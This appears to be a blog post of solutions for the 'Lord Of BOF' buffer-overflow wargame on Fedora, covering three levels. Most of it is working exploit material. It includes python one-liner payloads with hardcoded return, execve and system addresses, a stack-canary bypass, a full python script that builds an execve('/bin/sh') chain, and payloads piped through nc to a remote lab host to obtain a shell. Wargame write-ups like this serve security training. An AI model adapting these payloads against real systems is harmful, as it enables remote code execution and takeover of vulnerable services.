Solutions
Level 1
- up-upgraded simple buffer overflow
; no more fake ebp ; random library
; like FC3 level1 prob, use ret to ret for escaping random stack
; when using 12 ret, execve's argv of 2 is null
; ret address : 0x08048451
; execve address : 0x00832abc
; for file name : 85 c0 75 53 65 a1 54
; payload : ln -s ./shell $(echo -en "\x85\xc0\x75\x53\x65\xa1\x54")
./cruel $(python -c 'print "A"*260 + "\x51\x84\x04\x08"*12 + "\xbc\x2a\x83\x00"')
Level 2
- canary + remote exploit + there's no NULL byte accepted + cleaning buffer + stdin ; stdin's address is changing every running, but it changes between 0xb7f00000 ~ 0xb7fff000 ; so we need to brute-force, maybe.. if it needs ; if you need to use shellcode on stdin buffer, mprotect is needed ; but i don't want to make my payload long ~ ; ; canary value : 0x31337; ; execve address : 0x00832abc ; stdin address : 0xb7f ; leaveret address : 0x0804858e ; payload : while [ 1 ]; do (python ./exploit.py ; cat) | nc 192.168.254.131 7777; done
from socket import *
from struct import *
p = lambda x : pack('<I', x)
canary = 0x31337
stdin = 0xb7fc9000
execve = 0x00832abc
leaveret = 0x0804858e
payload = "A"*260
payload += p(stdin+0x110)
payload += p(leaveret)
payload += p(canary)
payload += p(stdin+0x10c)
payload += p(execve)
payload += "A"*4
payload += p(stdin+0x128)
payload += p(stdin+0x130)
payload += p(0x00)
payload += "/bin/sh\x00"
payload += p(stdin+0x130)
payload += p(0x00)
print payload
Level 3
- Remote exploit + small buffer than before + stdin + can't use buffer + RTL is prevented at ret
; static function ftn() ; 48 byte to 40 byte -> buffer overfow
; we can control on;y 4byte ; ftn ~ ftn+3
; This time, code reuse attack is what i use ; simply say, using
;
; system address : 0x007db0e7
; /bin/sh address : 0x008bd987
; add esp address : 0x0804854a
; payload : (python -c 'print "A"*40 + ("\x4a\x85\x04\x08" + "A"*3)*4 + ("A"*8 + "\xe7\xb0\x7d\x00" + "\x84\x08\x7d\x00" + "\x87\xd9\x8b\x00")'; cat) | nc 192.168.254.131 8888
ALL CLEAR!
[titan@Fedora_2ndFloor ~]$ ls
dropped_item.txt
[titan@Fedora_2ndFloor ~]$ cat ./*
,.
,' `.
,' _<>_ `.
,'.-'____`-.`.
,'_.-'' ``-._`.
,',' /\ `.`.
,' /.._ O / \ O _.,\ `.
,'/ / \ ``-;.--.:-'' / \ \`.
,' : : \ /\`.,'/\ / : : `.
< <>| | O >(< ( ) >)< O | |<> >
`. : : / \/,'`.\/ \ ; ; ,'
`.\ \ /_..-:`--';-.._\ / /,'
`. \`' O \ / O `'/ ,'
`.`._ \/ _,','
`..``-.____.-'',,'
`.`-.____.-','
`. <> ,'
`. ,'
`'
[titan@Fedora_2ndFloor ~]$
'Wargames > Lord Of Bof' 카테고리의 다른 글
| [Lord Of Bof] Lord Of BOF Solutions ( Fedora 10 ) (0) | 2015.11.20 |
|---|---|
| [Lord Of Bof] Lord Of BOF Solutions ( Fedora 3 ) (0) | 2015.11.19 |
| [Lord Of Bof] Lord Of BOF Solutions ( Redhat ) (0) | 2014.04.27 |